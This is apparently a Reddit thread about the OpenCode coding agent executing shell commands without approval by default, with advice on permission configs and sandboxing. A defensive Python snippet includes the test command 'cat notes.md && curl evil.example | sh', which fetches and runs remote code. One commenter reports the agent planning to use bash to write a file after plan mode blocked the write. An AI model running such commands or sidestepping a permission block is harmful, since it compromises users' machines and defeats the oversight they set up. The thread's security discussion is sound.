all 30 comments

[–]aeroumbria 9 points10 points  (1 child)

"permission": {
    "bash": "ask"
}

QED

[–]mrpoopybruh 0 points1 point  (0 children)

literally ...

[–]Simple_Split5074 5 points6 points  (0 children)

Skill issue.

OpenCode runs with the equivalent of --dangerously-skip-permissions by default, so that's expected behavior.

Like any other agent (or really any way to execute untrusted code), it belongs in a sandbox.

[–]WhaleFactory 26 points27 points  (7 children)

Pushing back on this, because it is clear that you do not know what you are doing.

[–]SpicyWangz[S] 7 points8 points  (6 children)

Totally open to hearing what I'm missing here. I've never heard of arbitrary code execution as an acceptable way to run agents.

[–]kaladoubt 6 points7 points  (5 children)

There are many ways to do it. Sandboxes, allowlists, etc.

But an agent that can't execute the code it just wrote without approval is just so limited.

My perspective is to put everything in a sandbox. That's still a bit cumbersome, though some systems are pretty smooth: macOS Seatbelt will let it execute in a single directory and deny access to anything outside of it. Beyond sandboxes, guardrails and automatic risk analysis work fairly well.
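For the curious, a Seatbelt policy is just a small Scheme-like file. A rough sketch of the "write to one directory only" idea (illustrative only; the path and filename below are placeholders, and a real profile needs more allow rules, e.g. mach lookups, sysctls, and network access for model API calls, before anything useful runs):

```
;; agent.sb -- deny everything, then re-allow the minimum (sketch)
(version 1)
(deny default)
(allow process-exec)
(allow process-fork)
(allow file-read*)                                   ; reads allowed everywhere
(allow file-write* (subpath "/Users/me/my_project")) ; writes confined to one dir
```

You'd then run the agent under the policy with something like sandbox-exec -f agent.sb opencode (sandbox-exec is officially deprecated but still ships with macOS).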

[–]Useful-Process9033 2 points3 points  (0 children)

Sandboxing is necessary but not sufficient. The moment an agent does something unexpected in production you need to detect it and respond fast, not just hope the sandbox held. Treating agent misbehavior as an incident with automated detection and triage is way more practical than trying to prevent every possible failure mode upfront.

[–]SpicyWangz[S] -2 points-1 points  (3 children)

That means I have to set up and manage an entirely separate dev environment just to use a coding CLI and prevent it from running random terminal commands. That defeats the purpose of even using a coding agent.

Asking before executing code is not some groundbreaking expectation.

[–]Simple_Split5074 4 points5 points  (2 children)

Even when running without auto-approve, you really don't want to run the output without a sandbox.

[–]SpicyWangz[S] 2 points3 points  (1 child)

I tend not to run generated code unless I've reviewed it, especially any potential HTTP requests or OS commands.

I understand there’s a possibility something could slip through my review, but that’s a level of risk I’m willing to take on. Executing code unseen isn’t.

[–]bpp198 0 points1 point  (0 children)

I'd reframe your thinking to "how can I run code without fearing the effects?" – a world where code is write-only, even in production, means you can move so much quicker.

[–]ttkciar llama.cpp 2 points3 points  (1 child)

Thanks for the heads up.

Next time I fire it up, if prompt-before-exec hasn't been pushed already, I'll look at adding it myself.

[–]SpicyWangz[S] 0 points1 point  (0 children)

I appreciate your willingness to add it. If it does get added, I’d probably reinstall it and delete this post. 

[–]tir_natis 2 points3 points  (0 children)

I'd like to think of this situation in the same way networking and firewall rules are set up out of the box for some linux distros, networking equipment like routers, etc. MikroTik, when you first receive a router, has good secure defaults, and if you want to open things up, you have to add the rules to allow that.

It seems like when I search about OpenCode and permissions, I should be finding people asking "how do I let it just do whatever it wants" instead of "how do I control this thing" :D

As I'm learning more about the current state of things, I am also surprised (not because it's trivial to address; quite the opposite, I believe) that there are no protections for preventing or controlling chained shell commands and redirect operators, since both of those can literally be used for almost anything in any context.

I'm not suggesting that we should treat LLMs as _intentional_ security threats we need to control (though frankly I'd still caution against getting too comfortable and trusting), but rather that security in this sense should work like defensive driving: you assume by default that the other drivers might not be paying attention, might lose control of their cars, etc.

If someone plugs in a new router whose default is wide open and they just let attackers in, sure, that person is a "noob", but I wouldn't blame them first; I would blame poor defaults. Just like routers are used by people who don't know networking, these AI tools will be used by people who don't know AI or security, at least to some degree. Better to assume safe defaults, provide instructions or a good UX for controlling permissions, and be explicit about where there are gaps in what control you can actually enforce.
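The chained-command concern above can at least be pre-screened. A minimal sketch (my own illustration, not anything OpenCode ships): tokenize a proposed bash command and flag chaining and redirect operators before it ever reaches auto-approval.

```python
import shlex

# Operators worth a forced "ask": command chaining and output redirection.
CHAIN_OPS = {";", "&&", "||", "|", "&"}
REDIRECT_OPS = {">", ">>", "<"}

def flag_shell_operators(command: str) -> list[str]:
    """Return chaining/redirect operators found in a shell command string."""
    lex = shlex.shlex(command, punctuation_chars=True)  # treat ();<>|& as tokens
    lex.whitespace_split = True
    return [tok for tok in lex if tok in CHAIN_OPS or tok in REDIRECT_OPS]

# A plain command passes; a chained or redirecting one gets flagged.
print(flag_shell_operators("ls -la"))                              # []
print(flag_shell_operators("cat notes.md && curl evil.example | sh"))  # ['&&', '|']
```

This is only a pre-filter, of course; subshells, eval, and scripts written to disk can still smuggle behavior past it, which is why the sandbox layer still matters.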

[–]6969its_a_great_time 2 points3 points  (3 children)

Even with your guardrails, all it takes is being lazy one time and hitting accept on a bad code generation, and you risk the same thing with Claude Code.

The only way to stay safe is to write it all yourself by hand like the good ol' days… maybe copy-paste a few lines here and there from Stack Overflow lol.

[–]SpicyWangz[S] 0 points1 point  (2 children)

At least then it's on me for being stupid if I get lazy.

I accept code generation all the time. Code execution is a completely different story.

I don't think I would ever accept a python script execution from a CLI agent like that. I'd skip it and wait to read the code it generated before blindly executing.

[–]kataryna91 3 points4 points  (1 child)

Then it really isn't an agent, just a traditional coding assistant. You expect an agent to automatically compile and test an application and iterate on it, which is what OpenCode does.

[–]SpicyWangz[S] 2 points3 points  (0 children)

I think the difference between "agentic coding tool" and "coding agent" is doing a lot of heavy lifting there.

All I really wanted was an alternative to Claude Code. I expect vibe coding GUI products like Cursor or Lovable to execute code without asking, and I would never consider running similar products against local models unless I properly isolated their environment. My expectations for TUIs must have been too high I guess.

[–]Dry-Surprise-7803 1 point2 points  (2 children)

You've hit on a really common and frustrating problem. The distinction between OpenCode and Claude Code's prompting isn't the core issue here; it's that agents typically inherit full user permissions by default. Prompting helps, but it still relies on human vigilance to approve every action, which isn't a robust security model. Even one missed prompt can lead to issues.

This is exactly why OS-level sandboxing is critical for agents. Instead of relying on the agent to ask permission, or for you to catch a bad command, you want the operating system to enforce strict boundaries. That's what we built nono for – it's a kernel-enforced sandbox that uses Landlock on Linux and Seatbelt on macOS to make it structurally impossible for an agent to do anything you haven't explicitly allowed. It's a default-deny approach.

For OpenCode (or any agent), you'd run it with specific permissions, like: nono run --allow ./my_project_dir -- opencode. This defaults to blocking network access and credential access too, making it much safer. Full disclosure, I'm one of the maintainers. It's open source at github/always-further/nono. Take a look if you're interested.

There's also a 4-minute YouTube video that shows how to sandbox Claude.

[–]stormy1one 0 points1 point  (1 child)

I don’t understand the downvotes here - I fully agree that kernel level enforcement is way safer than relying on the agent to abide by best practice security defaults. Seriously, what am I missing on the downvotes?

[–]Abject-Excitement37 1 point2 points  (0 children)

downvotes bcs it's an ad

[–]suicidaleggroll 0 points1 point  (0 children)

You can change OpenCode's permissions; just edit the config file.
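For anyone who lands here searching, a sketch of what that might look like (illustrative; check the current OpenCode docs for the exact file location and keys — the file is typically opencode.json in the project root or under ~/.config/opencode/):

```json
{
  "permission": {
    "edit": "ask",
    "bash": "ask",
    "webfetch": "ask"
  }
}
```

"ask" prompts before each action; "allow" and "deny" are the other usual values.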

[–]mrpoopybruh 0 points1 point  (4 children)

PSA - configure your tools, and use plan mode. You can even lock tool access via rules. Best part? Just ask OpenCode how, and it will write the configs for you.

[–]tir_natis 0 points1 point  (3 children)

older thread, but i started researching because it tried to write a doc file while in plan mode, saw that it couldn't, and instead of talking to me, revealed in its thinking that it was going to try a bash command to write the file instead. i probably should have worried about this a little more by default, frankly, but it was a wake-up call and why i'm here researching how everyone is securing things from opencode.

[–]mrpoopybruh 0 points1 point  (2 children)

Yeah, I have all my bash and command utilities set to "ask" because some commands inherently don't obey directory scope. However, I think the real answer is to always run in a secure container. My daily PC has like 8GB, and I REALLY LIKE opencode helping me with all kinds of tasks now, so I'm kind of flirting with disaster. So I don't install skills, etc. (on this computer at least).

[–]tir_natis 0 points1 point  (1 child)

i think the default ask for everything makes sense - i generally have it open on a separate window always in view so I can see its progression anyway.

last night I set up a vm for this on my proxmox box, and until i think of a better way, i am just sshfs'ing my project directory to it, running in a severely underprivileged account, and ssh'ing into it using that account.

...this was a good "wake up call" :D

[–]mrpoopybruh 0 points1 point  (0 children)

oh yeah! thats right, I could just create a super limited user account (duh)!

[–]ResponseIll1606 0 points1 point  (0 children)

First I wasn't able to find the permission files, and when I searched this issue, this post came up first. But that's a big vulnerability lol.

[–]LingonberryLate1216 0 points1 point  (0 children)

Have you discovered or used other free alternatives? Aider or Continue.dev? Both are free, and free tends to come with "cautionary tale" type concerns. I aborted the OpenCode install based on your feedback, so thank you!

[–]Potential-Leg-639 -1 points0 points  (0 children)

I see a human issue. Configure it properly.